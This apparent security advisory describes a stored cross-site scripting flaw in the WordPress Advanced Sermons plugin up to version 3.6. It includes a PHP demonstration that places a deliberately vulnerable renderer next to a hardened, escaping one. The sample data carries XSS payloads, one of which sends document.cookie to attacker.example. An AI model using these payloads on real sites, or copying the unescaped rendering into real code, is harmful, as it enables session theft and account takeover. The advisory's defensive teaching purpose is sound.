Impact
WP CodeUs Advanced Sermons is vulnerable to Stored Cross-Site Scripting because it fails to neutralize user input before rendering it on the site. An attacker can embed malicious script in sermon content; the payload is saved with the sermon and executes in the browser of every visitor who loads the affected page. Because the script runs in the site's own origin, it can read any cookie not marked HttpOnly, read and submit forms, and perform actions as whichever user is viewing the page, which makes an administrator viewing the sermon listing the most valuable target.
Affected Systems
The vulnerability affects the WordPress Advanced Sermons plugin in all versions up to and including 3.6. Administrators, or any user whose role allows adding or editing sermon entries, can inject a payload that is stored in the database and rendered to site visitors. The page does not name a fixed release, so treat any install at 3.6 or lower as affected until the plugin changelog confirms otherwise.
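To make the failure mode concrete, the block below is an added illustration written for this page; it is not code from the Advanced Sermons plugin, and the sermon field names (`title`, `speaker`, `summary`) and the payload are constructed assumptions. It shows the unescaped rendering pattern that produces a stored XSS next to a hardened version that escapes per output context. The escaping helpers are plain-PHP stand-ins so the file runs with the `php` CLI alone; in a real plugin the WordPress functions `esc_html()`, `esc_attr()` and `wp_kses_post()` do the same job.

```php
<?php
// Added example for this advisory page, not the plugin's own code.
// Sermon record shape and payload are constructed for illustration.

// Constructed payload of the kind a user with sermon-editing rights could store.
$sermon = [
    'title'   => 'Sunday Service <script>location="https://attacker.example/?c="+document.cookie</script>',
    'speaker' => 'Jane" onmouseover="alert(1)',
    'summary' => '<p>Hope and <em>renewal</em></p><img src=x onerror="alert(document.domain)">',
];

// Vulnerable pattern: stored values concatenated straight into HTML.
// Every field becomes a script execution sink for whoever views the page.
function render_sermon_vulnerable(array $s): string {
    return '<h2>' . $s['title'] . '</h2>'
         . '<span data-speaker="' . $s['speaker'] . '">' . $s['speaker'] . '</span>'
         . '<div>' . $s['summary'] . '</div>';
}

// Hardened pattern: escape for the context the value lands in.
// Stand-in for WordPress esc_html(): safe for text between tags.
function esc_html_ctx(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Stand-in for WordPress esc_attr(): safe inside a double-quoted attribute.
function esc_attr_ctx(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Simplified stand-in for wp_kses_post(): keep a small allow-list of formatting
// tags and strip event handlers and URL attributes from what survives.
// wp_kses_post() does this properly with a full tag/attribute allow-list.
function kses_lite(string $v): string {
    $stripped = strip_tags($v, '<p><em><strong><br>');
    // strip_tags keeps attributes on allowed tags, so remove the dangerous ones.
    return preg_replace(
        '/\s+(on\w+|href|src|style)\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)/i',
        '',
        $stripped
    );
}

function render_sermon_hardened(array $s): string {
    return '<h2>' . esc_html_ctx($s['title']) . '</h2>'
         . '<span data-speaker="' . esc_attr_ctx($s['speaker']) . '">'
         . esc_html_ctx($s['speaker']) . '</span>'
         . '<div>' . kses_lite($s['summary']) . '</div>';
}

echo "VULNERABLE:\n", render_sermon_vulnerable($sermon), "\n\n";
echo "HARDENED:\n",   render_sermon_hardened($sermon),   "\n";
```

Running it prints the vulnerable output with the `<script>`, the broken-out `onmouseover` attribute and the `<img onerror>` intact, and the hardened output with the title and speaker reduced to inert text and the summary reduced to `<p>Hope and <em>renewal</em></p>`. The point to take from it is that escaping is chosen per sink: a value that is safe as element text is still dangerous in an attribute, and rich-text fields need an allow-list filter rather than entity encoding.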
Risk and Exploitability
The CVSS base score of 6.5 indicates medium severity. The EPSS score is below 1 %, suggesting exploitation is unlikely at present, and the vulnerability is not listed in CISA's KEV catalog. Neither figure should be read as a reason to defer patching: stored XSS in a WordPress plugin is routinely mass-scanned, and EPSS is a probability estimate, not evidence that the bug is hard to trigger. Exploitation requires the ability to submit or modify sermon content, which in practice means an authenticated user with a role that can create or edit sermon entries. Once the payload is stored, every visitor to the affected page runs the script in their browser, and a logged-in administrator viewing that page is exposed to session theft and forged actions. No other prerequisites are stated, so the risk is contingent on how widely the site grants sermon-editing rights.